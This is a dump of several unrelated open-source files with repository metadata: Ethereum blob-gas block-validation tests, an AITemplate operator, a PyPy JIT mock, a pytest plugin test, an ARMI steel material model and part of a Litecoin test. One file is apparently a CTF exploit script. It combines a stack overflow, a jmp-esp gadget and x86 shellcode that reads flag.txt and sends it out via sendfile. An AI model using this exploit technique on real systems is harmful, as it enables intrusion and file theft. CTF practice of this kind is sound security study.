def header_blob_gas_used() -> Optional[int]: # noqa: D103
return None
@pytest.fixture
def blocks( # noqa: D103
tx: Transaction,
header_excess_blob_gas: Optional[int],
header_blob_gas_used: Optional[int],
non_zero_blob_gas_used_genesis_block: Block,
):
blocks = (
[]
if non_zero_blob_gas_used_genesis_block is None
else [non_zero_blob_gas_used_genesis_block]
)
if header_excess_blob_gas is not None:
blocks.append(
Block(
txs=[tx],
rlp_modifier=Header(
excess_blob_gas=header_excess_blob_gas,
),
exception="invalid excess blob gas",
),
)
elif header_blob_gas_used is not None:
blocks.append(
Block(
txs=[tx],
rlp_modifier=Header(
blob_gas_used=header_blob_gas_used,
),
exception="invalid blob gas used",
),
)
else:
blocks.append(Block(txs=[tx]))
return blocks
@pytest.mark.parametrize("parent_blobs", range(0, SpecHelpers.max_blobs_per_block() + 1))
@pytest.mark.parametrize("parent_excess_blobs", range(0, SpecHelpers.target_blobs_per_block() + 1))
@pytest.mark.parametrize("new_blobs", [1])
def test_correct_excess_blob_gas_calculation(
blockchain_test: BlockchainTestFiller,
env: Environment,
pre: Mapping[str, Account],
blocks: List[Block],
post: Mapping[str, Account],
correct_excess_blob_gas: int,
):
"""
Test calculation of the `excessBlobGas` increase/decrease across
multiple blocks with and without blobs:
- With parent block containing `[0, MAX_BLOBS_PER_BLOCK]` blobs
- With parent block containing `[0, TARGET_BLOBS_PER_BLOCK]` equivalent value of excess blob gas
""" # noqa: E501
blockchain_test(
pre=pre,
post=post,
blocks=blocks,
genesis_environment=env,
tag=f"expected_excess_blob_gas:{hex(correct_excess_blob_gas)}",
)
BLOB_GAS_COST_INCREASES = [
SpecHelpers.get_min_excess_blobs_for_blob_gas_price(i)
for i in [
2, # First blob gas cost increase
2**32 // Spec.GAS_PER_BLOB, # Data tx wei cost 2^32
2**32, # blob gas cost 2^32
2**64 // Spec.GAS_PER_BLOB, # Data tx wei cost 2^64
2**64, # blob gas cost 2^64
(
120_000_000 * (10**18) // Spec.GAS_PER_BLOB
), # Data tx wei is current total Ether supply
]
]
@pytest.mark.parametrize(
"parent_excess_blobs",
[g - 1 for g in BLOB_GAS_COST_INCREASES],
)
@pytest.mark.parametrize("parent_blobs", [SpecHelpers.target_blobs_per_block() + 1])
@pytest.mark.parametrize("new_blobs", [1])
def test_correct_increasing_blob_gas_costs(
blockchain_test: BlockchainTestFiller,
env: Environment,
pre: Mapping[str, Account],
blocks: List[Block],
post: Mapping[str, Account],
correct_excess_blob_gas: int,
):
"""
Test calculation of the `excessBlobGas` and blob gas tx costs at
value points where the cost increases to interesting amounts:
- At the first blob gas cost increase (1 to 2)
- At total transaction data cost increase to `> 2^32`
- At blob gas wei cost increase to `> 2^32`
- At total transaction data cost increase to `> 2^64`
- At blob gas wei cost increase to `> 2^64`
- At blob gas wei cost increase of around current total Ether supply
"""
blockchain_test(
pre=pre,
post=post,
blocks=blocks,
genesis_environment=env,
tag=f"expected_excess_blob_gas:{hex(correct_excess_blob_gas)}",
)
@pytest.mark.parametrize(
"parent_excess_blobs",
[g for g in BLOB_GAS_COST_INCREASES],
)
@pytest.mark.parametrize("parent_blobs", [SpecHelpers.target_blobs_per_block() - 1])
@pytest.mark.parametrize("new_blobs", [1])
def test_correct_decreasing_blob_gas_costs(
blockchain_test: BlockchainTestFiller,
env: Environment,
pre: Mapping[str, Account],
blocks: List[Block],
post: Mapping[str, Account],
correct_excess_blob_gas: int,
):
"""
Test calculation of the `excessBlobGas` and blob gas tx costs at
value points where the cost decreases to interesting amounts.
See test_correct_increasing_blob_gas_costs.
"""
blockchain_test(
pre=pre,
post=post,
blocks=blocks,
genesis_environment=env,
tag=f"expected_excess_blob_gas:{hex(correct_excess_blob_gas)}",
)
@pytest.mark.parametrize("header_excess_blob_gas", [0])
@pytest.mark.parametrize("new_blobs", [0, 1])
@pytest.mark.parametrize("parent_blobs", range(0, SpecHelpers.max_blobs_per_block() + 1))
def test_invalid_zero_excess_blob_gas_in_header(
blockchain_test: BlockchainTestFiller,
env: Environment,
pre: Mapping[str, Account],
blocks: List[Block],
correct_excess_blob_gas: int,
header_excess_blob_gas: Optional[int],
):
"""
Test rejection of blocks where the `excessBlobGas` in the header drops to
zero in a block with or without data blobs, but the excess blobs in the parent are
greater than target.
"""
if header_excess_blob_gas is None:
raise Exception("test case is badly formatted")
if header_excess_blob_gas == correct_excess_blob_gas:
raise Exception("invalid test case")
blockchain_test(
pre=pre,
post={},
blocks=blocks,
genesis_environment=env,
tag="-".join(
[
f"correct:{hex(correct_excess_blob_gas)}",
f"header:{hex(header_excess_blob_gas)}",
]
),
)
def all_invalid_blob_gas_used_combinations() -> Iterator[Tuple[int, int]]:
"""
Returns all invalid blob gas used combinations.
"""
for new_blobs in range(0, SpecHelpers.max_blobs_per_block() + 1):
for header_blob_gas_used in range(0, SpecHelpers.max_blobs_per_block() + 1):
if new_blobs != header_blob_gas_used:
yield (new_blobs, header_blob_gas_used * Spec.GAS_PER_BLOB)
yield (new_blobs, 2**64 - 1)
@pytest.mark.parametrize(
"new_blobs,header_blob_gas_used",
all_invalid_blob_gas_used_combinations(),
)
@pytest.mark.parametrize("parent_blobs", [0])
def test_invalid_blob_gas_used_in_header(
blockchain_test: BlockchainTestFiller,
env: Environment,
pre: Mapping[str, Account],
blocks: List[Block],
new_blobs: int,
header_blob_gas_used: Optional[int],
):
"""
Test rejection of blocks where the `blobGasUsed` in the header is invalid:
- `blobGasUsed` is not equal to the number of data blobs in the block
- `blobGasUsed` is the max uint64 value
"""
if header_blob_gas_used is None:
raise Exception("test case is badly formatted")
blockchain_test(
pre=pre,
post={},
blocks=blocks,
genesis_environment=env,
tag="-".join(
[
f"correct:{hex(new_blobs *Spec.GAS_PER_BLOB)}",
f"header:{hex(header_blob_gas_used)}",
]
),
)
@pytest.mark.parametrize(
"header_excess_blobs_delta,parent_blobs",
[
(-1, 0),
(+1, SpecHelpers.max_blobs_per_block()),
],
ids=["zero_blobs_decrease_more_than_expected", "max_blobs_increase_more_than_expected"],
)
@pytest.mark.parametrize("new_blobs", [1])
def test_invalid_excess_blob_gas_above_target_change(
blockchain_test: BlockchainTestFiller,
env: Environment,
pre: Mapping[str, Account],
blocks: List[Block],
correct_excess_blob_gas: int,
header_excess_blob_gas: Optional[int],
):
"""
Test rejection of blocks where the `excessBlobGas`
- decreases more than `TARGET_BLOB_GAS_PER_BLOCK` in a single block with zero blobs
- increases more than `TARGET_BLOB_GAS_PER_BLOCK` in a single block with max blobs
"""
if header_excess_blob_gas is None:
raise Exception("test case is badly formatted")
if header_excess_blob_gas == correct_excess_blob_gas:
raise Exception("invalid test case")
blockchain_test(
pre=pre,
post={},
blocks=blocks,
genesis_environment=env,
tag="-".join(
[
f"correct:{hex(correct_excess_blob_gas)}",
f"header:{hex(header_excess_blob_gas)}",
]
),
)
@pytest.mark.parametrize(
"parent_blobs",
[
b
for b in range(0, SpecHelpers.max_blobs_per_block() + 1)
if b != SpecHelpers.target_blobs_per_block()
],
)
@pytest.mark.parametrize("parent_excess_blobs", [1, SpecHelpers.target_blobs_per_block()])
@pytest.mark.parametrize("new_blobs", [1])
def test_invalid_static_excess_blob_gas(
blockchain_test: BlockchainTestFiller,
env: Environment,
pre: Mapping[str, Account],
blocks: List[Block],
correct_excess_blob_gas: int,
parent_excess_blob_gas: int,
):
"""
Test rejection of blocks where the `excessBlobGas` remains unchanged
but the parent blobs included are not `TARGET_BLOBS_PER_BLOCK`.
Test is parametrized to `MAX_BLOBS_PER_BLOCK` and `TARGET_BLOBS_PER_BLOCK`.
"""
blocks[-1].rlp_modifier = Header(excess_blob_gas=parent_excess_blob_gas)
blocks[-1].exception = "invalid excessBlobGas"
blockchain_test(
pre=pre,
post={},
blocks=blocks,
genesis_environment=env,
tag="-".join(
[
f"correct:{hex(correct_excess_blob_gas)}",
f"header:{hex(parent_excess_blob_gas)}",
]
),
)
@pytest.mark.parametrize("header_excess_blobs_delta", range(1, SpecHelpers.max_blobs_per_block()))
@pytest.mark.parametrize("parent_blobs", range(0, SpecHelpers.target_blobs_per_block() + 1))
@pytest.mark.parametrize("parent_excess_blobs", [0]) # Start at 0
@pytest.mark.parametrize("new_blobs", [1])
def test_invalid_excess_blob_gas_target_blobs_increase_from_zero(
blockchain_test: BlockchainTestFiller,
env: Environment,
pre: Mapping[str, Account],
blocks: List[Block],
correct_excess_blob_gas: int,
header_excess_blob_gas: Optional[int],
):
"""
Test rejection of blocks where the `excessBlobGas` increases from zero,
even when the included blobs are on or below target.
Test is parametrized according to `[0, TARGET_BLOBS_PER_BLOCK` new blobs.
"""
if header_excess_blob_gas is None:
raise Exception("test case is badly formatted")
if header_excess_blob_gas == correct_excess_blob_gas:
raise Exception("invalid test case")
blockchain_test(
pre=pre,
post={},
blocks=blocks,
genesis_environment=env,
tag="-".join(
[
f"correct:{hex(correct_excess_blob_gas)}",
f"header:{hex(header_excess_blob_gas)}",
]
),
)
@pytest.mark.parametrize("header_excess_blob_gas", [0])
@pytest.mark.parametrize(
"parent_blobs",
range(SpecHelpers.target_blobs_per_block() + 1, SpecHelpers.max_blobs_per_block() + 1),
)
@pytest.mark.parametrize("parent_excess_blobs", [0]) # Start at 0
@pytest.mark.parametrize("new_blobs", [1])
def test_invalid_static_excess_blob_gas_from_zero_on_blobs_above_target(
blockchain_test: BlockchainTestFiller,
env: Environment,
pre: Mapping[str, Account],
blocks: List[Block],
correct_excess_blob_gas: int,
header_excess_blob_gas: Optional[int],
):
"""
Test rejection of blocks where the `excessBlobGas` does not increase from
zero, even when the included blobs is above target.
Test is parametrized to `[TARGET_BLOBS_PER_BLOCK+1, MAX_BLOBS_PER_BLOCK]` new blobs.
"""
if header_excess_blob_gas is None:
raise Exception("test case is badly formatted")
if header_excess_blob_gas == correct_excess_blob_gas:
raise Exception("invalid test case")
blockchain_test(
pre=pre,
post={},
blocks=blocks,
genesis_environment=env,
tag="-".join(
[
f"correct:{hex(correct_excess_blob_gas)}",
f"header:{hex(header_excess_blob_gas)}",
]
),
)
@pytest.mark.parametrize(
"parent_blobs,header_excess_blobs_delta",
itertools.product(
# parent_blobs
range(0, SpecHelpers.max_blobs_per_block() + 1),
# header_excess_blobs_delta (from correct value)
[
x
for x in range(
-SpecHelpers.target_blobs_per_block(), SpecHelpers.target_blobs_per_block() + 1
)
if x != 0
],
),
)
@pytest.mark.parametrize("new_blobs", [1])
def test_invalid_excess_blob_gas_change(
blockchain_test: BlockchainTestFiller,
env: Environment,
pre: Mapping[str, Account],
blocks: List[Block],
correct_excess_blob_gas: int,
header_excess_blob_gas: Optional[int],
):
"""
Test rejection of blocks where the `excessBlobGas` changes to an invalid
value.
Given a parent block containing `[0, MAX_BLOBS_PER_BLOCK]` blobs, test an invalid
`excessBlobGas` value by changing it by `[-TARGET_BLOBS_PER_BLOCK, TARGET_BLOBS_PER_BLOCK]`
from the correct value.
"""
if header_excess_blob_gas is None:
raise Exception("test case is badly formatted")
if header_excess_blob_gas == correct_excess_blob_gas:
raise Exception("invalid test case")
blockchain_test(
pre=pre,
post={},
blocks=blocks,
genesis_environment=env,
tag="-".join(
[
f"correct:{hex(correct_excess_blob_gas)}",
f"header:{hex(header_excess_blob_gas)}",
]
),
)
@pytest.mark.parametrize(
"header_excess_blob_gas",
[(2**64 + (x * Spec.GAS_PER_BLOB)) for x in range(-SpecHelpers.target_blobs_per_block(), 0)],
)
@pytest.mark.parametrize("parent_blobs", range(SpecHelpers.target_blobs_per_block()))
@pytest.mark.parametrize("new_blobs", [1])
@pytest.mark.parametrize("parent_excess_blobs", range(SpecHelpers.target_blobs_per_block()))
def test_invalid_negative_excess_blob_gas(
blockchain_test: BlockchainTestFiller,
env: Environment,
pre: Mapping[str, Account],
blocks: List[Block],
correct_excess_blob_gas: int,
header_excess_blob_gas: Optional[int],
):
"""
Test rejection of blocks where the `excessBlobGas` changes to the two's
complement equivalent of the negative value after subtracting target blobs.
Reasoning is that the `excessBlobGas` is a `uint64`, so it cannot be negative, and
we test for a potential underflow here.
"""
if header_excess_blob_gas is None:
raise Exception("test case is badly formatted")
if header_excess_blob_gas == correct_excess_blob_gas:
raise Exception("invalid test case")
blockchain_test(
pre=pre,
post={},
blocks=blocks,
genesis_environment=env,
tag="-".join(
[
f"correct:{hex(correct_excess_blob_gas)}",
f"header:{hex(header_excess_blob_gas)}",
]
),
)
@pytest.mark.parametrize(
"parent_blobs,header_excess_blob_gas_delta",
[
(SpecHelpers.target_blobs_per_block() + 1, 1),
(SpecHelpers.target_blobs_per_block() + 1, Spec.GAS_PER_BLOB - 1),
(SpecHelpers.target_blobs_per_block() - 1, -1),
(SpecHelpers.target_blobs_per_block() - 1, -(Spec.GAS_PER_BLOB - 1)),
],
)
@pytest.mark.parametrize("new_blobs", [1])
@pytest.mark.parametrize("parent_excess_blobs", [SpecHelpers.target_blobs_per_block() + 1])
def test_invalid_non_multiple_excess_blob_gas(
blockchain_test: BlockchainTestFiller,
env: Environment,
pre: Mapping[str, Account],
blocks: List[Block],
correct_excess_blob_gas: int,
header_excess_blob_gas: Optional[int],
):
"""
Test rejection of blocks where the `excessBlobGas` changes to a value that
is not a multiple of Spec.GAS_PER_BLOB`:
- Parent block contains `TARGET_BLOBS_PER_BLOCK + 1` blobs, but `excessBlobGas` is off by +/-1
- Parent block contains `TARGET_BLOBS_PER_BLOCK - 1` blobs, but `excessBlobGas` is off by +/-1
"""
if header_excess_blob_gas is None:
raise Exception("test case is badly formatted")
if header_excess_blob_gas == correct_excess_blob_gas:
raise Exception("invalid test case")
blockchain_test(
pre=pre,
post={},
blocks=blocks,
genesis_environment=env,
tag="-".join(
[
f"correct:{hex(correct_excess_blob_gas)}",
f"header:{hex(header_excess_blob_gas)}",
]
),
)
|
6103daeb5f15af6f876a104244920f44e91607f5
|
8d77f3b72dc52b85ee0c4ef6ba06f63a6920841f
|
/python/aitemplate/compiler/ops/padding/pad_last_dim.py
|
6def61e730b03e73241b86ae1814ec702bdfa2c2
|
[
"Apache-2.0"
] |
permissive
|
facebookincubator/AITemplate
|
b643c217e1d15f7f17dab1eb1cc6855eab664b97
|
c60dc19788217556ba12ea378c02b9fd0aea9ffe
|
refs/heads/main
| 2023-08-28T18:22:15.828008
| 2023-08-28T14:43:41
| 2023-08-28T14:43:41
| 514,321,895
| 4,065
| 334
|
Apache-2.0
| 2023-09-14T04:53:57
| 2022-07-15T15:40:58
|
Python
|
UTF-8
|
Python
| false
| false
| 3,103
|
py
|
pad_last_dim.py
|
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Pad last dimension.
"""
from typing import List
import jinja2
from aitemplate import backend
from aitemplate.backend import registry
from aitemplate.compiler.base import IntImm, Operator, Tensor
# pylint: disable=C0103,W0221
SHAPE_FUNC_TEMPLATE = jinja2.Template(
"""
{% for dim in shape %}
{{indent}}{{dtype}}X_DIM{{loop.index - 1}} = {{dim}};
{% endfor %}
{{indent}}{{dtype}}Y_OUT_DIM = {{out_dim}};
"""
)
SHAPE_ASSIGNMENT_TEMPLATE = jinja2.Template(
"""
{% for dim in shape %}
{{indent}}{{dtype}}{{dim}} = X_DIM{{loop.index - 1}};
{% endfor %}
{{indent}}{{dtype}}{{last_dim}} = Y_OUT_DIM;
"""
)
class pad_last_dim(Operator):
"""Pad the last dimension of the input data to the specified length."""
def __init__(self, ndim: int, out_dim: int):
super().__init__()
self._attrs["op"] = "pad_last_dim"
self._attrs["ndim"] = ndim
self._attrs["out_dim"] = out_dim
self.shape_eval_template = SHAPE_FUNC_TEMPLATE
self.shape_save_template = SHAPE_ASSIGNMENT_TEMPLATE
def _infer_shapes(self, x: Tensor):
"""Infers shapes for pad_last_dim."""
x_shape = x._attrs["shape"]
ndim = len(x_shape)
if self._attrs["out_dim"] <= max(x_shape[-1]._attrs["values"]):
raise RuntimeError("Output of padded dim must be larger than original dim")
if ndim != self._attrs["ndim"]:
raise RuntimeError("Data/Op dims mismatch")
if ndim > 4:
raise NotImplementedError
output_shape = list(x_shape)
output_shape[-1] = IntImm(self._attrs["out_dim"])
return output_shape
def __call__(self, x: Tensor) -> List[Tensor]:
self._attrs["inputs"] = [x]
self._set_depth()
output_shape = self._infer_shapes(x)
output = Tensor(output_shape, src_ops={self}, dtype=x._attrs["dtype"])
self._attrs["outputs"] = [output]
return output
def _get_op_attributes(self):
return {"ndim": self._attrs["ndim"], "out_dim": self._attrs["out_dim"]}
def gen_function(self) -> str:
target = backend.target.Target.current()
template_path = target.template_path()
func_key = "{target}.{op}.gen_function".format(
target=target.name(), op=self._attrs["op"]
)
func = registry.get(func_key)
return func(
self._attrs,
template_path,
self.shape_eval_template,
self.shape_save_template,
)
|
0a4f2cd3137e87ec639951780c25585fc21f5d3d
|
704976ea552111c6a5af9cd7cb62b9d9abaf3996
|
/rpython/jit/tool/oparser_model.py
|
a52d879f419656b801c11258ca3505ab9c51dec3
|
[
"BSD-3-Clause"
] |
permissive
|
mesalock-linux/mesapy
|
4f02c5819ce7f2f6e249d34840f1aa097577645d
|
ed546d59a21b36feb93e2309d5c6b75aa0ad95c9
|
refs/heads/mesapy2.7
| 2023-08-16T21:33:02.239581
| 2019-08-13T10:29:43
| 2019-08-13T18:06:45
| 136,080,721
| 396
| 33
|
NOASSERTION
| 2020-04-01T03:05:18
| 2018-06-04T20:45:17
|
Python
|
UTF-8
|
Python
| false
| false
| 4,846
|
py
|
oparser_model.py
|
class Boxes(object):
pass
def get_real_model():
class LoopModel(object):
from rpython.jit.metainterp.history import TreeLoop, JitCellToken
from rpython.jit.metainterp.history import ConstInt, ConstPtr, ConstFloat
from rpython.jit.metainterp.history import BasicFailDescr, BasicFinalDescr, TargetToken
from rpython.jit.metainterp.typesystem import llhelper
from rpython.jit.metainterp.opencoder import Trace
from rpython.jit.metainterp.history import get_const_ptr_for_string
from rpython.jit.metainterp.history import get_const_ptr_for_unicode
get_const_ptr_for_string = staticmethod(get_const_ptr_for_string)
get_const_ptr_for_unicode = staticmethod(get_const_ptr_for_unicode)
@staticmethod
def convert_to_floatstorage(arg):
from rpython.jit.codewriter import longlong
return longlong.getfloatstorage(float(arg))
@staticmethod
def ptr_to_int(obj):
from rpython.jit.codewriter.heaptracker import adr2int
from rpython.rtyper.lltypesystem import llmemory
return adr2int(llmemory.cast_ptr_to_adr(obj))
return LoopModel
def get_mock_model():
class MockLoopModel(object):
class TreeLoop(object):
def __init__(self, name):
self.name = name
class JitCellToken(object):
I_am_a_descr = True
class TargetToken(object):
def __init__(self, jct):
pass
class BasicFailDescr(object):
I_am_a_descr = True
final_descr = False
class BasicFinalDescr(object):
I_am_a_descr = True
final_descr = True
class Box(object):
_counter = 0
type = 'b'
def __init__(self, value=0):
self.value = value
def __repr__(self):
result = str(self)
result += '(%s)' % self.value
return result
def __str__(self):
if not hasattr(self, '_str'):
self._str = '%s%d' % (self.type, Box._counter)
Box._counter += 1
return self._str
class BoxInt(Box):
type = 'i'
class BoxFloat(Box):
type = 'f'
class BoxRef(Box):
type = 'p'
class BoxVector(Box):
type = 'V'
class Const(object):
bytesize = 8
signed = True
def __init__(self, value=None):
self.value = value
def _get_str(self):
return str(self.value)
def is_constant(self):
return True
class ConstInt(Const):
datatype = 'i'
pass
class ConstPtr(Const):
datatype = 'r'
pass
class ConstFloat(Const):
datatype = 'f'
signed = False
pass
@classmethod
def get_const_ptr_for_string(cls, s):
return cls.ConstPtr(s)
@classmethod
def get_const_ptr_for_unicode(cls, s):
return cls.ConstPtr(s)
@staticmethod
def convert_to_floatstorage(arg):
return float(arg)
@staticmethod
def ptr_to_int(obj):
return id(obj)
class llhelper(object):
pass
MockLoopModel.llhelper.BoxRef = MockLoopModel.BoxRef
return MockLoopModel
def get_model(use_mock):
if use_mock:
model = get_mock_model()
else:
model = get_real_model()
class ExtendedTreeLoop(model.TreeLoop):
def as_json(self):
return {
'comment': self.comment,
'name': self.name,
'operations': [op.as_json() for op in self.operations],
'inputargs': self.inputargs,
'last_offset': self.last_offset
}
def getboxes(self):
def opboxes(operations):
for op in operations:
yield op.result
for box in op.getarglist():
yield box
def allboxes():
for box in self.inputargs:
yield box
for box in opboxes(self.operations):
yield box
boxes = Boxes()
for box in allboxes():
if isinstance(box, model.Box):
name = str(box)
setattr(boxes, name, box)
return boxes
def setvalues(self, **kwds):
boxes = self.getboxes()
for name, value in kwds.iteritems():
getattr(boxes, name).value = value
model.ExtendedTreeLoop = ExtendedTreeLoop
return model
|
ce618000e59756a77fff313c6dabf22f2e5c46f0
|
dd317f56cd0d93b66e174e93691dd09d4e191d30
|
/tests/test_03_multiple_dependency.py
|
a5e585a9faf2bc1396a48b59eef52c7a1ca6cfb8
|
[
"Apache-2.0"
] |
permissive
|
RKrahl/pytest-dependency
|
32f87a10b86d21c7ec201153570e41144ca443d0
|
cab2f65ced816939a9041b9e67169073ef0ee412
|
refs/heads/develop
| 2023-04-27T13:06:40.853328
| 2022-02-17T17:06:21
| 2022-02-17T17:06:21
| 56,441,594
| 131
| 33
|
Apache-2.0
| 2022-03-25T10:00:08
| 2016-04-17T14:46:54
|
Python
|
UTF-8
|
Python
| false
| false
| 1,746
|
py
|
test_03_multiple_dependency.py
|
"""A complicated scenario with tests having multiple dependencies.
"""
import pytest
def test_multiple(ctestdir):
ctestdir.makepyfile("""
import pytest
@pytest.mark.dependency(name="a")
def test_a():
pytest.skip("explicit skip")
@pytest.mark.dependency(name="b")
def test_b():
assert False
@pytest.mark.dependency(name="c")
def test_c():
pass
@pytest.mark.dependency(name="d")
def test_d():
pass
@pytest.mark.dependency(name="e")
def test_e():
pass
@pytest.mark.dependency(name="f", depends=["a", "c"])
def test_f():
pass
@pytest.mark.dependency(name="g", depends=["b", "d"])
def test_g():
pass
@pytest.mark.dependency(name="h", depends=["c", "e"])
def test_h():
pass
@pytest.mark.dependency(name="i", depends=["f", "h"])
def test_i():
pass
@pytest.mark.dependency(name="j", depends=["d", "h"])
def test_j():
pass
@pytest.mark.dependency(name="k", depends=["g", "i", "j"])
def test_k():
pass
""")
result = ctestdir.runpytest("--verbose")
result.assert_outcomes(passed=5, skipped=5, failed=1)
result.stdout.re_match_lines(r"""
.*::test_a SKIPPED(?:\s+\(.*\))?
.*::test_b FAILED
.*::test_c PASSED
.*::test_d PASSED
.*::test_e PASSED
.*::test_f SKIPPED(?:\s+\(.*\))?
.*::test_g SKIPPED(?:\s+\(.*\))?
.*::test_h PASSED
.*::test_i SKIPPED(?:\s+\(.*\))?
.*::test_j PASSED
.*::test_k SKIPPED(?:\s+\(.*\))?
""")
|
4a87d021a82c0a7b7fb83200ee07e61449d17f80
|
df4361db61d10a10c46ed5f18973d89e4efda82c
|
/armi/materials/ht9.py
|
b2e63580e627b61b72db828e5dd9234e1743c61c
|
[
"Apache-2.0",
"GPL-1.0-or-later",
"BSD-3-Clause",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
terrapower/armi
|
5524741c5e80781e136ea3422aed0db8398f76ae
|
360791847227df3f3a337a996ef561e00f846a09
|
refs/heads/main
| 2023-09-04T05:16:29.080518
| 2023-09-01T16:10:29
| 2023-09-01T16:10:29
| 218,863,590
| 204
| 75
|
Apache-2.0
| 2023-09-14T20:42:24
| 2019-10-31T21:18:34
|
Python
|
UTF-8
|
Python
| false
| false
| 2,945
|
py
|
ht9.py
|
# Copyright 2019 TerraPower, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Simple/academic/incomplete HT9 ferritic-martensitic stainless steel material.
This is a famous SFR cladding/duct material because it doesn't void swell that much.
"""
from armi import materials
from armi.utils import units
class HT9(materials.Material):
"""
Simplified HT9 stainless steel.
.. warning:: This is an academic-quality material.
When more detail is desired, a custom material should be implemented via a
user-provided plugin.
.. [MFH] Metallic Fuels Handbook
Hofman, G. L., Billone, M. C., Koenig, J. F., Kramer, J. M., Lambert, J. D. B., Leibowitz, L.,
Orechwa, Y., Pedersen, D. R., Porter, D. L., Tsai, H., and Wright, A. E. Metallic Fuels Handbook.
United States: N. p., 2019. Web. doi:10.2172/1506477.
https://www.osti.gov/biblio/1506477-metallic-fuels-handbook
"""
propertyValidTemperature = {"linear expansion": ((293, 1050), "K")}
def setDefaultMassFracs(self):
"""
HT9 mass fractions.
From E.2-1 of [MFH]_.
https://www.osti.gov/biblio/1506477-metallic-fuels-handbook
"""
self.setMassFrac("C", 0.002)
self.setMassFrac("MN", 0.005)
self.setMassFrac("SI", 0.0025)
self.setMassFrac("NI", 0.0055)
self.setMassFrac("CR", 0.1175)
self.setMassFrac("MO", 0.01)
self.setMassFrac("W", 0.0055)
self.setMassFrac("V", 0.0030)
self.setMassFrac("FE", 1.0 - sum(self.massFrac.values()))
self.refDens = 7.778
def linearExpansionPercent(self, Tk=None, Tc=None):
"""
Gets the linear expansion from E.2.2.2 in [MFH]_ for HT9.
The ref gives dL/L0 in percent and is valid from 293 - 1050 K.
"""
tk = units.getTk(Tc, Tk)
self.checkPropertyTempRange("linear expansion", tk)
return -0.16256 + 1.62307e-4 * tk + 1.42357e-6 * tk**2 - 5.50344e-10 * tk**3
def thermalConductivity(self, Tk=None, Tc=None):
"""
Thermal conductivity in W/m-K).
From [MFH]_, E.2.2.3, eq 5.
.. tip:: This can probably be sped up with a polynomial evaluator.
"""
Tk = units.getTk(Tc, Tk)
return (
29.65
- 6.668e-2 * Tk
+ 2.184e-4 * Tk**2
- 2.527e-7 * Tk**3
+ 9.621e-11 * Tk**4
)
|
f2c13db67e193e8b314ebc3106ae0671cfd83147
|
24db6985a016c3e4767c95ca51190e659d0847cd
|
/hacktivityctf2021/yabo/exploit.py
|
785d759e9cc4f4df9606fe7500f1d70a7a9a2ab0
|
[
"MIT"
] |
permissive
|
datajerk/ctf-write-ups
|
463f53db224410a51df481b9e41b7777a09f3e2c
|
c33815911de3f4a66cbafbf5f12d7b57239250d9
|
refs/heads/master
| 2022-09-30T02:29:44.097435
| 2022-09-05T02:16:19
| 2022-09-05T02:16:19
| 204,361,251
| 136
| 36
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,522
|
py
|
exploit.py
|
#!/usr/bin/env python3
from pwn import *
from binascii import hexlify
binary = context.binary = ELF('./yabo')
if args.REMOTE:
p = remote('challenge.ctf.games', 32332)
else:
p = remote('127.0.0.1', 9999)
arg0 = b'./flag.txt'
shellcode = asm(f'''
/* open flag.txt */
xor eax, eax # eax = 0
xor ecx, ecx # ecx = 0
xor edx, edx # edx = 0
mov ebx, {'-0x' + hexlify(arg0[8:][::-1]).decode()} # because of nulls set a neg, then use neg, then push to stack
neg ebx
push ebx
push {'0x' + hexlify(arg0[4:8][::-1]).decode()} # rest of filename
push {'0x' + hexlify(arg0[0:4][::-1]).decode()}
mov ebx, esp # ebx points to ./flag.txt
mov al, {constants.SYS_open} # open file, eax will have FD for open file
int 0x80
/* use sendfile to, well, send the file */
mov ecx, eax # mv open FD to ecx
dec eax # fd from open
mov ebx, eax # now fd of accept
push 50 # length of flag?
pop esi
xor edx, edx # zero edx, may not been required since done above and not used
xor eax, eax # eax = 0
mov al, 187 # sendfile syscall (was not in pwn tools table)
int 0x80
''')
log.info('len(shellcode): ' + str(len(shellcode)))
jmp_esp = next(binary.search(asm('jmp esp')))
payload = b''
payload += 0x414 * b'A'
payload += p32(jmp_esp)
payload += shellcode
if payload.find(b'\0') != -1:
log.critical('NULL in payload, exiting!')
print(disasm(shellcode))
sys.exit(1)
p.sendlineafter(b'say?: ',payload)
p.stream()
|
838f289137edba4673204a7b640bcb4f896e01db
|
7efe08063fd383640455cc709ef04c889b8ebc42
|
/test/functional/feature_notifications.py
|
9fdfa7d83c9943ce0bdbc424cd8000effe98ce2f
|
[
"MIT"
] |
permissive
|
litecoin-project/litecoin
|
0d55434c63e41409f3c69b43199a9cb6bd256a83
|
5ac781487cc9589131437b23c69829f04002b97e
|
refs/heads/master
| 2023-09-05T21:38:55.634991
| 2023-04-24T04:08:34
| 2023-05-12T06:47:49
| 4,646,198
| 4,040
| 4,600
|
MIT
| 2023-07-29T19:58:50
| 2012-06-13T04:18:26
|
C++
|
UTF-8
|
Python
| false
| false
| 7,574
|
py
|
feature_notifications.py
|
#!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the -alertnotify, -blocknotify and -walletnotify options."""
import os
from test_framework.address import ADDRESS_BCRT1_UNSPENDABLE, keyhash_to_p2pkh
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
hex_str_to_bytes,
)
# Linux allow all characters other than \x00
# Windows disallow control characters (0-31) and /\?%:|"<>
FILE_CHAR_START = 32 if os.name == 'nt' else 1
FILE_CHAR_END = 128
FILE_CHARS_DISALLOWED = '/\\?%*:|"<>' if os.name == 'nt' else '/'
def notify_outputname(walletname, txid):
return txid if os.name == 'nt' else '{}_{}'.format(walletname, txid)
class NotificationsTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.setup_clean_chain = True
def setup_network(self):
